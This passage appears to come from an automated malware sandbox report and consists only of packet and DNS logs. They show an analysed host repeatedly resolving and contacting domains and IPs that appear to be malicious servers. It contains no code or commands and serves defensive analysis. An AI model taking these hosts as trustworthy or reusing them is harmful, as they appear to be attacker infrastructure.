                                                                                                        Dec 2, 2024 14:39:06.138546944 CET5001280192.168.2.63.33.130.190
                                                                                                        Dec 2, 2024 14:39:06.259108067 CET80500123.33.130.190192.168.2.6
                                                                                                        Dec 2, 2024 14:39:06.259921074 CET5001280192.168.2.63.33.130.190
                                                                                                        Dec 2, 2024 14:39:06.280425072 CET5001280192.168.2.63.33.130.190
                                                                                                        Dec 2, 2024 14:39:06.400595903 CET80500123.33.130.190192.168.2.6
                                                                                                        Dec 2, 2024 14:39:07.450359106 CET80500123.33.130.190192.168.2.6
                                                                                                        Dec 2, 2024 14:39:07.450409889 CET5001280192.168.2.63.33.130.190
                                                                                                        Dec 2, 2024 14:39:07.791507006 CET5001280192.168.2.63.33.130.190
                                                                                                        Dec 2, 2024 14:39:07.911439896 CET80500123.33.130.190192.168.2.6
                                                                                                        Dec 2, 2024 14:39:08.812427044 CET5001380192.168.2.63.33.130.190
                                                                                                        Dec 2, 2024 14:39:08.932418108 CET80500133.33.130.190192.168.2.6
                                                                                                        Dec 2, 2024 14:39:08.932514906 CET5001380192.168.2.63.33.130.190
                                                                                                        Dec 2, 2024 14:39:08.950103045 CET5001380192.168.2.63.33.130.190
                                                                                                        Dec 2, 2024 14:39:09.070365906 CET80500133.33.130.190192.168.2.6
                                                                                                        Dec 2, 2024 14:39:09.070383072 CET80500133.33.130.190192.168.2.6
                                                                                                        Dec 2, 2024 14:39:10.029650927 CET80500133.33.130.190192.168.2.6
                                                                                                        Dec 2, 2024 14:39:10.033042908 CET5001380192.168.2.63.33.130.190
                                                                                                        Dec 2, 2024 14:39:10.464963913 CET5001380192.168.2.63.33.130.190
                                                                                                        Dec 2, 2024 14:39:10.584933043 CET80500133.33.130.190192.168.2.6
                                                                                                        Dec 2, 2024 14:39:11.482672930 CET5001480192.168.2.63.33.130.190
                                                                                                        Dec 2, 2024 14:39:11.602655888 CET80500143.33.130.190192.168.2.6
                                                                                                        Dec 2, 2024 14:39:11.602716923 CET5001480192.168.2.63.33.130.190
                                                                                                        Dec 2, 2024 14:39:11.615056992 CET5001480192.168.2.63.33.130.190
                                                                                                        Dec 2, 2024 14:39:11.735053062 CET80500143.33.130.190192.168.2.6
                                                                                                        Dec 2, 2024 14:39:12.751909971 CET80500143.33.130.190192.168.2.6
                                                                                                        Dec 2, 2024 14:39:12.752151966 CET80500143.33.130.190192.168.2.6
                                                                                                        Dec 2, 2024 14:39:12.753071070 CET5001480192.168.2.63.33.130.190
                                                                                                        Dec 2, 2024 14:39:12.756997108 CET5001480192.168.2.63.33.130.190
                                                                                                        Dec 2, 2024 14:39:12.877608061 CET80500143.33.130.190192.168.2.6
                                                                                                        Dec 2, 2024 14:39:18.417188883 CET5001580192.168.2.63.33.130.190
                                                                                                        Dec 2, 2024 14:39:18.537188053 CET80500153.33.130.190192.168.2.6
                                                                                                        Dec 2, 2024 14:39:18.542418003 CET5001580192.168.2.63.33.130.190
                                                                                                        Dec 2, 2024 14:39:18.561003923 CET5001580192.168.2.63.33.130.190
                                                                                                        Dec 2, 2024 14:39:18.681046009 CET80500153.33.130.190192.168.2.6
                                                                                                        Dec 2, 2024 14:39:19.684990883 CET80500153.33.130.190192.168.2.6
                                                                                                        Dec 2, 2024 14:39:19.685126066 CET5001580192.168.2.63.33.130.190
                                                                                                        Dec 2, 2024 14:39:20.072880030 CET5001580192.168.2.63.33.130.190
                                                                                                        Dec 2, 2024 14:39:20.192867994 CET80500153.33.130.190192.168.2.6
                                                                                                        Dec 2, 2024 14:39:21.092825890 CET5001780192.168.2.63.33.130.190
                                                                                                        Dec 2, 2024 14:39:21.212955952 CET80500173.33.130.190192.168.2.6
                                                                                                        Dec 2, 2024 14:39:21.213102102 CET5001780192.168.2.63.33.130.190
                                                                                                        Dec 2, 2024 14:39:21.231775045 CET5001780192.168.2.63.33.130.190
                                                                                                        Dec 2, 2024 14:39:21.352055073 CET80500173.33.130.190192.168.2.6
                                                                                                        Dec 2, 2024 14:39:22.356283903 CET80500173.33.130.190192.168.2.6
                                                                                                        Dec 2, 2024 14:39:22.359225035 CET5001780192.168.2.63.33.130.190
                                                                                                        Dec 2, 2024 14:39:22.747158051 CET5001780192.168.2.63.33.130.190
                                                                                                        Dec 2, 2024 14:39:22.867182016 CET80500173.33.130.190192.168.2.6
                                                                                                        Dec 2, 2024 14:39:23.764401913 CET5001880192.168.2.63.33.130.190
                                                                                                        Dec 2, 2024 14:39:23.884381056 CET80500183.33.130.190192.168.2.6
                                                                                                        Dec 2, 2024 14:39:23.884597063 CET5001880192.168.2.63.33.130.190
                                                                                                        Dec 2, 2024 14:39:23.902400970 CET5001880192.168.2.63.33.130.190
                                                                                                        Dec 2, 2024 14:39:24.022424936 CET80500183.33.130.190192.168.2.6
                                                                                                        Dec 2, 2024 14:39:24.022479057 CET80500183.33.130.190192.168.2.6
                                                                                                        Dec 2, 2024 14:39:25.072813988 CET80500183.33.130.190192.168.2.6
                                                                                                        Dec 2, 2024 14:39:25.072866917 CET5001880192.168.2.63.33.130.190
                                                                                                        Dec 2, 2024 14:39:25.416609049 CET5001880192.168.2.63.33.130.190
                                                                                                        Dec 2, 2024 14:39:25.536673069 CET80500183.33.130.190192.168.2.6
                                                                                                        Dec 2, 2024 14:39:26.435373068 CET5001980192.168.2.63.33.130.190
                                                                                                        Dec 2, 2024 14:39:26.558588028 CET80500193.33.130.190192.168.2.6
                                                                                                        Dec 2, 2024 14:39:26.558762074 CET5001980192.168.2.63.33.130.190
                                                                                                        Dec 2, 2024 14:39:26.573471069 CET5001980192.168.2.63.33.130.190
                                                                                                        Dec 2, 2024 14:39:26.696269989 CET80500193.33.130.190192.168.2.6
                                                                                                        Dec 2, 2024 14:39:27.662194014 CET80500193.33.130.190192.168.2.6
                                                                                                        Dec 2, 2024 14:39:27.662303925 CET80500193.33.130.190192.168.2.6
                                                                                                        Dec 2, 2024 14:39:27.662405968 CET5001980192.168.2.63.33.130.190
                                                                                                        Dec 2, 2024 14:39:27.665736914 CET5001980192.168.2.63.33.130.190
                                                                                                        Dec 2, 2024 14:39:27.787311077 CET80500193.33.130.190192.168.2.6
                                                                                                        Dec 2, 2024 14:39:33.853832006 CET5002080192.168.2.647.238.157.253
                                                                                                        Dec 2, 2024 14:39:34.011516094 CET805002047.238.157.253192.168.2.6
                                                                                                        Dec 2, 2024 14:39:34.011651993 CET5002080192.168.2.647.238.157.253
                                                                                                        Dec 2, 2024 14:39:34.032985926 CET5002080192.168.2.647.238.157.253
                                                                                                        Dec 2, 2024 14:39:34.153016090 CET805002047.238.157.253192.168.2.6
                                                                                                        Dec 2, 2024 14:39:35.541606903 CET5002080192.168.2.647.238.157.253
                                                                                                        Dec 2, 2024 14:39:35.709899902 CET805002047.238.157.253192.168.2.6
                                                                                                        Dec 2, 2024 14:39:36.560590982 CET5002180192.168.2.647.238.157.253
                                                                                                        Dec 2, 2024 14:39:36.680777073 CET805002147.238.157.253192.168.2.6
                                                                                                        Dec 2, 2024 14:39:36.683276892 CET5002180192.168.2.647.238.157.253
                                                                                                        Dec 2, 2024 14:39:36.699934006 CET5002180192.168.2.647.238.157.253
                                                                                                        Dec 2, 2024 14:39:36.819932938 CET805002147.238.157.253192.168.2.6
                                                                                                        Dec 2, 2024 14:39:38.213542938 CET5002180192.168.2.647.238.157.253
                                                                                                        Dec 2, 2024 14:39:38.373907089 CET805002147.238.157.253192.168.2.6
                                                                                                        Dec 2, 2024 14:39:39.233123064 CET5002280192.168.2.647.238.157.253
                                                                                                        Dec 2, 2024 14:39:39.353060961 CET805002247.238.157.253192.168.2.6
                                                                                                        Dec 2, 2024 14:39:39.353138924 CET5002280192.168.2.647.238.157.253
                                                                                                        Dec 2, 2024 14:39:39.370096922 CET5002280192.168.2.647.238.157.253
                                                                                                        Dec 2, 2024 14:39:39.491197109 CET805002247.238.157.253192.168.2.6
                                                                                                        Dec 2, 2024 14:39:39.491266966 CET805002247.238.157.253192.168.2.6
                                                                                                        Dec 2, 2024 14:39:40.885385036 CET5002280192.168.2.647.238.157.253
                                                                                                        Dec 2, 2024 14:39:41.049129009 CET805002247.238.157.253192.168.2.6
                                                                                                        Dec 2, 2024 14:39:41.904834986 CET5002380192.168.2.647.238.157.253
                                                                                                        Dec 2, 2024 14:39:42.025614977 CET805002347.238.157.253192.168.2.6
                                                                                                        Dec 2, 2024 14:39:42.025758028 CET5002380192.168.2.647.238.157.253
                                                                                                        Dec 2, 2024 14:39:42.045149088 CET5002380192.168.2.647.238.157.253
                                                                                                        Dec 2, 2024 14:39:42.165612936 CET805002347.238.157.253192.168.2.6
                                                                                                        Dec 2, 2024 14:39:55.919307947 CET805002047.238.157.253192.168.2.6
                                                                                                        Dec 2, 2024 14:39:55.919383049 CET5002080192.168.2.647.238.157.253
                                                                                                        Dec 2, 2024 14:39:58.647094965 CET805002147.238.157.253192.168.2.6
                                                                                                        Dec 2, 2024 14:39:58.649174929 CET5002180192.168.2.647.238.157.253
                                                                                                        Dec 2, 2024 14:40:01.247657061 CET805002247.238.157.253192.168.2.6
                                                                                                        Dec 2, 2024 14:40:01.247720003 CET5002280192.168.2.647.238.157.253
                                                                                                        Dec 2, 2024 14:40:03.919306040 CET805002347.238.157.253192.168.2.6
                                                                                                        Dec 2, 2024 14:40:03.919439077 CET5002380192.168.2.647.238.157.253
                                                                                                        Dec 2, 2024 14:40:03.920293093 CET5002380192.168.2.647.238.157.253
                                                                                                        Dec 2, 2024 14:40:04.044935942 CET805002347.238.157.253192.168.2.6
                                                                                                        Dec 2, 2024 14:40:09.438901901 CET5002580192.168.2.667.223.117.169
                                                                                                        Dec 2, 2024 14:40:09.558985949 CET805002567.223.117.169192.168.2.6
                                                                                                        Dec 2, 2024 14:40:09.559087038 CET5002580192.168.2.667.223.117.169
                                                                                                        Dec 2, 2024 14:40:09.588248014 CET5002580192.168.2.667.223.117.169
                                                                                                        Dec 2, 2024 14:40:09.708363056 CET805002567.223.117.169192.168.2.6
                                                                                                        Dec 2, 2024 14:40:10.781769037 CET805002567.223.117.169192.168.2.6
                                                                                                        Dec 2, 2024 14:40:10.782011986 CET805002567.223.117.169192.168.2.6
                                                                                                        Dec 2, 2024 14:40:10.782145023 CET5002580192.168.2.667.223.117.169
                                                                                                        Dec 2, 2024 14:40:11.104279995 CET5002580192.168.2.667.223.117.169
                                                                                                        Dec 2, 2024 14:40:12.123323917 CET5002680192.168.2.667.223.117.169
                                                                                                        Dec 2, 2024 14:40:12.243330956 CET805002667.223.117.169192.168.2.6
                                                                                                        Dec 2, 2024 14:40:12.247469902 CET5002680192.168.2.667.223.117.169
                                                                                                        Dec 2, 2024 14:40:12.262773037 CET5002680192.168.2.667.223.117.169
                                                                                                        Dec 2, 2024 14:40:12.383843899 CET805002667.223.117.169192.168.2.6
                                                                                                        Dec 2, 2024 14:40:13.518690109 CET805002667.223.117.169192.168.2.6
                                                                                                        Dec 2, 2024 14:40:13.518779993 CET805002667.223.117.169192.168.2.6
                                                                                                        Dec 2, 2024 14:40:13.518955946 CET5002680192.168.2.667.223.117.169
                                                                                                        Dec 2, 2024 14:40:13.777151108 CET5002680192.168.2.667.223.117.169
                                                                                                        Dec 2, 2024 14:40:14.797194004 CET5002780192.168.2.667.223.117.169
                                                                                                        Dec 2, 2024 14:40:14.917224884 CET805002767.223.117.169192.168.2.6
                                                                                                        Dec 2, 2024 14:40:14.917459965 CET5002780192.168.2.667.223.117.169
                                                                                                        Dec 2, 2024 14:40:14.933132887 CET5002780192.168.2.667.223.117.169
                                                                                                        Dec 2, 2024 14:40:15.053119898 CET805002767.223.117.169192.168.2.6
                                                                                                        Dec 2, 2024 14:40:15.053663015 CET805002767.223.117.169192.168.2.6
                                                                                                        Dec 2, 2024 14:40:16.194259882 CET805002767.223.117.169192.168.2.6
                                                                                                        Dec 2, 2024 14:40:16.194443941 CET805002767.223.117.169192.168.2.6
                                                                                                        Dec 2, 2024 14:40:16.194628000 CET5002780192.168.2.667.223.117.169
                                                                                                        Dec 2, 2024 14:40:16.448257923 CET5002780192.168.2.667.223.117.169
                                                                                                        Dec 2, 2024 14:40:17.467675924 CET5002880192.168.2.667.223.117.169
                                                                                                        Dec 2, 2024 14:40:17.588016033 CET805002867.223.117.169192.168.2.6
                                                                                                        Dec 2, 2024 14:40:17.588109970 CET5002880192.168.2.667.223.117.169
                                                                                                        Dec 2, 2024 14:40:17.599652052 CET5002880192.168.2.667.223.117.169
                                                                                                        Dec 2, 2024 14:40:17.720365047 CET805002867.223.117.169192.168.2.6
                                                                                                        Dec 2, 2024 14:40:18.811355114 CET805002867.223.117.169192.168.2.6
                                                                                                        Dec 2, 2024 14:40:18.811466932 CET805002867.223.117.169192.168.2.6
                                                                                                        Dec 2, 2024 14:40:18.811722994 CET5002880192.168.2.667.223.117.169
                                                                                                        Dec 2, 2024 14:40:18.814647913 CET5002880192.168.2.667.223.117.169
                                                                                                        Dec 2, 2024 14:40:18.934606075 CET805002867.223.117.169192.168.2.6
                                                                                                        Dec 2, 2024 14:40:24.584052086 CET5002980192.168.2.685.159.66.93
                                                                                                        Dec 2, 2024 14:40:24.705699921 CET805002985.159.66.93192.168.2.6
                                                                                                        Dec 2, 2024 14:40:24.705903053 CET5002980192.168.2.685.159.66.93
                                                                                                        Dec 2, 2024 14:40:24.729211092 CET5002980192.168.2.685.159.66.93
                                                                                                        Dec 2, 2024 14:40:24.849236965 CET805002985.159.66.93192.168.2.6
                                                                                                        Dec 2, 2024 14:40:26.244875908 CET5002980192.168.2.685.159.66.93
                                                                                                        Dec 2, 2024 14:40:26.365211964 CET805002985.159.66.93192.168.2.6
                                                                                                        Dec 2, 2024 14:40:26.365557909 CET5002980192.168.2.685.159.66.93
                                                                                                        Dec 2, 2024 14:40:27.264108896 CET5003080192.168.2.685.159.66.93
                                                                                                        Dec 2, 2024 14:40:27.384082079 CET805003085.159.66.93192.168.2.6
                                                                                                        Dec 2, 2024 14:40:27.384215117 CET5003080192.168.2.685.159.66.93
                                                                                                        Dec 2, 2024 14:40:27.402673006 CET5003080192.168.2.685.159.66.93
                                                                                                        Dec 2, 2024 14:40:27.522902966 CET805003085.159.66.93192.168.2.6
                                                                                                        Dec 2, 2024 14:40:28.917218924 CET5003080192.168.2.685.159.66.93
                                                                                                        Dec 2, 2024 14:40:29.037806034 CET805003085.159.66.93192.168.2.6
                                                                                                        Dec 2, 2024 14:40:29.037940025 CET5003080192.168.2.685.159.66.93
                                                                                                        Dec 2, 2024 14:40:29.937592030 CET5003180192.168.2.685.159.66.93
                                                                                                        Dec 2, 2024 14:40:30.057864904 CET805003185.159.66.93192.168.2.6
                                                                                                        Dec 2, 2024 14:40:30.058000088 CET5003180192.168.2.685.159.66.93
                                                                                                        Dec 2, 2024 14:40:30.076677084 CET5003180192.168.2.685.159.66.93
                                                                                                        Dec 2, 2024 14:40:30.196762085 CET805003185.159.66.93192.168.2.6
                                                                                                        Dec 2, 2024 14:40:30.196793079 CET805003185.159.66.93192.168.2.6
                                                                                                        Dec 2, 2024 14:40:31.588701963 CET5003180192.168.2.685.159.66.93
                                                                                                        Dec 2, 2024 14:40:31.709120989 CET805003185.159.66.93192.168.2.6
                                                                                                        Dec 2, 2024 14:40:31.709178925 CET5003180192.168.2.685.159.66.93
                                                                                                        Dec 2, 2024 14:40:32.607717991 CET5003280192.168.2.685.159.66.93
                                                                                                        Dec 2, 2024 14:40:32.727670908 CET805003285.159.66.93192.168.2.6
                                                                                                        Dec 2, 2024 14:40:32.727799892 CET5003280192.168.2.685.159.66.93
                                                                                                        Dec 2, 2024 14:40:32.738020897 CET5003280192.168.2.685.159.66.93
                                                                                                        Dec 2, 2024 14:40:32.858042002 CET805003285.159.66.93192.168.2.6
                                                                                                        Dec 2, 2024 14:40:34.108509064 CET805003285.159.66.93192.168.2.6
                                                                                                        Dec 2, 2024 14:40:34.109057903 CET805003285.159.66.93192.168.2.6
                                                                                                        Dec 2, 2024 14:40:34.109265089 CET5003280192.168.2.685.159.66.93
                                                                                                        Dec 2, 2024 14:40:34.156435013 CET5003280192.168.2.685.159.66.93
                                                                                                        Dec 2, 2024 14:40:34.276537895 CET805003285.159.66.93192.168.2.6
                                                                                                        Dec 2, 2024 14:40:39.759699106 CET5003380192.168.2.6162.159.140.104
                                                                                                        Dec 2, 2024 14:40:39.879683018 CET8050033162.159.140.104192.168.2.6
                                                                                                        Dec 2, 2024 14:40:39.879760027 CET5003380192.168.2.6162.159.140.104
                                                                                                        Dec 2, 2024 14:40:39.986907959 CET5003380192.168.2.6162.159.140.104
                                                                                                        Dec 2, 2024 14:40:40.107320070 CET8050033162.159.140.104192.168.2.6
                                                                                                        Dec 2, 2024 14:40:41.494889021 CET5003380192.168.2.6162.159.140.104
                                                                                                        Dec 2, 2024 14:40:41.528103113 CET8050033162.159.140.104192.168.2.6
                                                                                                        Dec 2, 2024 14:40:41.528363943 CET5003380192.168.2.6162.159.140.104
                                                                                                        Dec 2, 2024 14:40:41.528464079 CET8050033162.159.140.104192.168.2.6
                                                                                                        Dec 2, 2024 14:40:41.528548002 CET5003380192.168.2.6162.159.140.104
                                                                                                        Dec 2, 2024 14:40:41.615710020 CET8050033162.159.140.104192.168.2.6
                                                                                                        Dec 2, 2024 14:40:41.615822077 CET5003380192.168.2.6162.159.140.104
                                                                                                        Dec 2, 2024 14:40:42.895970106 CET5003480192.168.2.6162.159.140.104
                                                                                                        Dec 2, 2024 14:40:43.016103983 CET8050034162.159.140.104192.168.2.6
                                                                                                        Dec 2, 2024 14:40:43.017362118 CET5003480192.168.2.6162.159.140.104
                                                                                                        Dec 2, 2024 14:40:43.165122032 CET5003480192.168.2.6162.159.140.104
                                                                                                        Dec 2, 2024 14:40:43.285835981 CET8050034162.159.140.104192.168.2.6
                                                                                                        Dec 2, 2024 14:40:44.683670044 CET5003480192.168.2.6162.159.140.104
                                                                                                        Dec 2, 2024 14:40:44.708770990 CET8050034162.159.140.104192.168.2.6
                                                                                                        Dec 2, 2024 14:40:44.709573030 CET8050034162.159.140.104192.168.2.6
                                                                                                        Dec 2, 2024 14:40:44.713347912 CET5003480192.168.2.6162.159.140.104
                                                                                                        Dec 2, 2024 14:40:44.713347912 CET5003480192.168.2.6162.159.140.104
                                                                                                        Dec 2, 2024 14:40:44.803661108 CET8050034162.159.140.104192.168.2.6
                                                                                                        Dec 2, 2024 14:40:44.809537888 CET5003480192.168.2.6162.159.140.104
                                                                                                        Dec 2, 2024 14:40:46.857850075 CET5003580192.168.2.6162.159.140.104
                                                                                                        Dec 2, 2024 14:40:46.978158951 CET8050035162.159.140.104192.168.2.6
                                                                                                        Dec 2, 2024 14:40:46.978276014 CET5003580192.168.2.6162.159.140.104
                                                                                                        Dec 2, 2024 14:40:46.994199038 CET5003580192.168.2.6162.159.140.104
                                                                                                        Dec 2, 2024 14:40:47.114475012 CET8050035162.159.140.104192.168.2.6
                                                                                                        Dec 2, 2024 14:40:47.114495993 CET8050035162.159.140.104192.168.2.6
                                                                                                        Dec 2, 2024 14:40:48.511975050 CET5003580192.168.2.6162.159.140.104
                                                                                                        Dec 2, 2024 14:40:48.609563112 CET8050035162.159.140.104192.168.2.6
                                                                                                        Dec 2, 2024 14:40:48.609710932 CET5003580192.168.2.6162.159.140.104
                                                                                                        Dec 2, 2024 14:40:48.610101938 CET8050035162.159.140.104192.168.2.6
                                                                                                        Dec 2, 2024 14:40:48.610166073 CET5003580192.168.2.6162.159.140.104
                                                                                                        Dec 2, 2024 14:40:48.632265091 CET8050035162.159.140.104192.168.2.6
                                                                                                        Dec 2, 2024 14:40:48.632399082 CET5003580192.168.2.6162.159.140.104
                                                                                                        Dec 2, 2024 14:40:49.529601097 CET5003680192.168.2.6162.159.140.104
                                                                                                        Dec 2, 2024 14:40:49.650933981 CET8050036162.159.140.104192.168.2.6
                                                                                                        Dec 2, 2024 14:40:49.651148081 CET5003680192.168.2.6162.159.140.104
                                                                                                        Dec 2, 2024 14:40:49.661510944 CET5003680192.168.2.6162.159.140.104
                                                                                                        Dec 2, 2024 14:40:49.781476974 CET8050036162.159.140.104192.168.2.6
                                                                                                        Dec 2, 2024 14:40:51.357806921 CET8050036162.159.140.104192.168.2.6
                                                                                                        Dec 2, 2024 14:40:51.357861042 CET8050036162.159.140.104192.168.2.6
                                                                                                        Dec 2, 2024 14:40:51.357872963 CET8050036162.159.140.104192.168.2.6
                                                                                                        Dec 2, 2024 14:40:51.358045101 CET5003680192.168.2.6162.159.140.104
                                                                                                        Dec 2, 2024 14:40:51.358064890 CET8050036162.159.140.104192.168.2.6
                                                                                                        Dec 2, 2024 14:40:51.358077049 CET8050036162.159.140.104192.168.2.6
                                                                                                        Dec 2, 2024 14:40:51.358088970 CET8050036162.159.140.104192.168.2.6
                                                                                                        Dec 2, 2024 14:40:51.358108044 CET5003680192.168.2.6162.159.140.104
                                                                                                        Dec 2, 2024 14:40:51.358136892 CET8050036162.159.140.104192.168.2.6
                                                                                                        Dec 2, 2024 14:40:51.358139992 CET5003680192.168.2.6162.159.140.104
                                                                                                        Dec 2, 2024 14:40:51.358149052 CET8050036162.159.140.104192.168.2.6
                                                                                                        Dec 2, 2024 14:40:51.358198881 CET5003680192.168.2.6162.159.140.104
                                                                                                        Dec 2, 2024 14:40:51.358987093 CET8050036162.159.140.104192.168.2.6
                                                                                                        Dec 2, 2024 14:40:51.359111071 CET8050036162.159.140.104192.168.2.6
                                                                                                        Dec 2, 2024 14:40:51.359164000 CET5003680192.168.2.6162.159.140.104
                                                                                                        Dec 2, 2024 14:40:51.363781929 CET5003680192.168.2.6162.159.140.104
                                                                                                        Dec 2, 2024 14:40:51.483740091 CET8050036162.159.140.104192.168.2.6
                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                        Dec 2, 2024 14:37:20.724688053 CET6301953192.168.2.61.1.1.1
                                                                                                        Dec 2, 2024 14:37:21.690649033 CET53630191.1.1.1192.168.2.6
                                                                                                        Dec 2, 2024 14:37:38.390896082 CET5999453192.168.2.61.1.1.1
                                                                                                        Dec 2, 2024 14:37:39.159745932 CET53599941.1.1.1192.168.2.6
                                                                                                        Dec 2, 2024 14:37:53.451452971 CET5300353192.168.2.61.1.1.1
                                                                                                        Dec 2, 2024 14:37:53.679882050 CET53530031.1.1.1192.168.2.6
                                                                                                        Dec 2, 2024 14:38:01.732362986 CET4955253192.168.2.61.1.1.1
                                                                                                        Dec 2, 2024 14:38:02.399349928 CET53495521.1.1.1192.168.2.6
                                                                                                        Dec 2, 2024 14:38:18.014503002 CET6524353192.168.2.61.1.1.1
                                                                                                        Dec 2, 2024 14:38:18.506180048 CET53652431.1.1.1192.168.2.6
                                                                                                        Dec 2, 2024 14:38:33.062088013 CET5316553192.168.2.61.1.1.1
                                                                                                        Dec 2, 2024 14:38:33.471018076 CET53531651.1.1.1192.168.2.6
                                                                                                        Dec 2, 2024 14:38:47.967339039 CET5937853192.168.2.61.1.1.1
                                                                                                        Dec 2, 2024 14:38:48.560231924 CET53593781.1.1.1192.168.2.6
                                                                                                        Dec 2, 2024 14:39:02.795798063 CET5039953192.168.2.61.1.1.1
                                                                                                        Dec 2, 2024 14:39:03.389425039 CET53503991.1.1.1192.168.2.6
                                                                                                        Dec 2, 2024 14:39:17.764126062 CET5866253192.168.2.61.1.1.1
                                                                                                        Dec 2, 2024 14:39:18.412097931 CET53586621.1.1.1192.168.2.6
                                                                                                        Dec 2, 2024 14:39:32.673048973 CET6034653192.168.2.61.1.1.1
                                                                                                        Dec 2, 2024 14:39:33.666887045 CET6034653192.168.2.61.1.1.1
                                                                                                        Dec 2, 2024 14:39:33.851263046 CET53603461.1.1.1192.168.2.6
                                                                                                        Dec 2, 2024 14:39:33.851278067 CET53603461.1.1.1192.168.2.6
                                                                                                        Dec 2, 2024 14:40:08.936533928 CET6148453192.168.2.61.1.1.1
                                                                                                        Dec 2, 2024 14:40:09.435236931 CET53614841.1.1.1192.168.2.6
                                                                                                        Dec 2, 2024 14:40:23.827955961 CET5425653192.168.2.61.1.1.1
                                                                                                        Dec 2, 2024 14:40:24.579834938 CET53542561.1.1.1192.168.2.6
                                                                                                        Dec 2, 2024 14:40:39.171408892 CET5992453192.168.2.61.1.1.1
                                                                                                        Dec 2, 2024 14:40:39.732336998 CET53599241.1.1.1192.168.2.6
                                                                                                        Dec 2, 2024 14:40:56.373853922 CET5752553192.168.2.61.1.1.1
                                                                                                        Dec 2, 2024 14:40:57.065243959 CET53575251.1.1.1192.168.2.6
                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                        Dec 2, 2024 14:37:20.724688053 CET192.168.2.61.1.1.10xd85Standard query (0)www.sidqwdf.funA (IP address)IN (0x0001)false
                                                                                                        Dec 2, 2024 14:37:38.390896082 CET192.168.2.61.1.1.10xb2aeStandard query (0)www.swenansiansie.xyzA (IP address)IN (0x0001)false
                                                                                                        Dec 2, 2024 14:37:53.451452971 CET192.168.2.61.1.1.10xc8dbStandard query (0)www.mp3cevir.xyzA (IP address)IN (0x0001)false
                                                                                                        Dec 2, 2024 14:38:01.732362986 CET192.168.2.61.1.1.10xe28eStandard query (0)www.spectre.centerA (IP address)IN (0x0001)false
                                                                                                        Dec 2, 2024 14:38:18.014503002 CET192.168.2.61.1.1.10xb0b4Standard query (0)www.synd.funA (IP address)IN (0x0001)false
                                                                                                        Dec 2, 2024 14:38:33.062088013 CET192.168.2.61.1.1.10x5d92Standard query (0)www.jagdud.storeA (IP address)IN (0x0001)false
                                                                                                        Dec 2, 2024 14:38:47.967339039 CET192.168.2.61.1.1.10x1169Standard query (0)www.wiretap.digitalA (IP address)IN (0x0001)false
                                                                                                        Dec 2, 2024 14:39:02.795798063 CET192.168.2.61.1.1.10x3c2dStandard query (0)www.it2sp8.vipA (IP address)IN (0x0001)false
                                                                                                        Dec 2, 2024 14:39:17.764126062 CET192.168.2.61.1.1.10x7c81Standard query (0)www.cbprecise.onlineA (IP address)IN (0x0001)false
                                                                                                        Dec 2, 2024 14:39:32.673048973 CET192.168.2.61.1.1.10x78ebStandard query (0)www.yun08ps.topA (IP address)IN (0x0001)false
                                                                                                        Dec 2, 2024 14:39:33.666887045 CET192.168.2.61.1.1.10x78ebStandard query (0)www.yun08ps.topA (IP address)IN (0x0001)false
                                                                                                        Dec 2, 2024 14:40:08.936533928 CET192.168.2.61.1.1.10xbedeStandard query (0)www.rtpsilva4d.clickA (IP address)IN (0x0001)false
                                                                                                        Dec 2, 2024 14:40:23.827955961 CET192.168.2.61.1.1.10xb0Standard query (0)www.restobarbebek.xyzA (IP address)IN (0x0001)false
                                                                                                        Dec 2, 2024 14:40:39.171408892 CET192.168.2.61.1.1.10x20e3Standard query (0)www.nagasl89.babyA (IP address)IN (0x0001)false
                                                                                                        Dec 2, 2024 14:40:56.373853922 CET192.168.2.61.1.1.10xfe76Standard query (0)www.themessageart.onlineA (IP address)IN (0x0001)false
                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                        Dec 2, 2024 14:37:21.690649033 CET1.1.1.1192.168.2.60xd85No error (0)www.sidqwdf.fun185.106.176.204A (IP address)IN (0x0001)false
                                                                                                        Dec 2, 2024 14:37:39.159745932 CET1.1.1.1192.168.2.60xb2aeNo error (0)www.swenansiansie.xyzswenansiansie.xyzCNAME (Canonical name)IN (0x0001)false
                                                                                                        Dec 2, 2024 14:37:39.159745932 CET1.1.1.1192.168.2.60xb2aeNo error (0)swenansiansie.xyz3.33.130.190A (IP address)IN (0x0001)false
                                                                                                        Dec 2, 2024 14:37:39.159745932 CET1.1.1.1192.168.2.60xb2aeNo error (0)swenansiansie.xyz15.197.148.33A (IP address)IN (0x0001)false
                                                                                                        Dec 2, 2024 14:37:53.679882050 CET1.1.1.1192.168.2.60xc8dbName error (3)www.mp3cevir.xyznonenoneA (IP address)IN (0x0001)false
                                                                                                        Dec 2, 2024 14:38:02.399349928 CET1.1.1.1192.168.2.60xe28eNo error (0)www.spectre.center5.39.10.93A (IP address)IN (0x0001)false
                                                                                                        Dec 2, 2024 14:38:18.506180048 CET1.1.1.1192.168.2.60xb0b4No error (0)www.synd.fun194.58.112.174A (IP address)IN (0x0001)false
                                                                                                        Dec 2, 2024 14:38:33.471018076 CET1.1.1.1192.168.2.60x5d92No error (0)www.jagdud.store209.74.64.187A (IP address)IN (0x0001)false
                                                                                                        Dec 2, 2024 14:38:48.560231924 CET1.1.1.1192.168.2.60x1169No error (0)www.wiretap.digitalwiretap.digitalCNAME (Canonical name)IN (0x0001)false
                                                                                                        Dec 2, 2024 14:38:48.560231924 CET1.1.1.1192.168.2.60x1169No error (0)wiretap.digital3.33.130.190A (IP address)IN (0x0001)false
                                                                                                        Dec 2, 2024 14:38:48.560231924 CET1.1.1.1192.168.2.60x1169No error (0)wiretap.digital15.197.148.33A (IP address)IN (0x0001)false
                                                                                                        Dec 2, 2024 14:39:03.389425039 CET1.1.1.1192.168.2.60x3c2dNo error (0)www.it2sp8.vipit2sp8.vipCNAME (Canonical name)IN (0x0001)false
                                                                                                        Dec 2, 2024 14:39:03.389425039 CET1.1.1.1192.168.2.60x3c2dNo error (0)it2sp8.vip3.33.130.190A (IP address)IN (0x0001)false
                                                                                                        Dec 2, 2024 14:39:03.389425039 CET1.1.1.1192.168.2.60x3c2dNo error (0)it2sp8.vip15.197.148.33A (IP address)IN (0x0001)false
                                                                                                        Dec 2, 2024 14:39:18.412097931 CET1.1.1.1192.168.2.60x7c81No error (0)www.cbprecise.onlinecbprecise.onlineCNAME (Canonical name)IN (0x0001)false
                                                                                                        Dec 2, 2024 14:39:18.412097931 CET1.1.1.1192.168.2.60x7c81No error (0)cbprecise.online3.33.130.190A (IP address)IN (0x0001)false
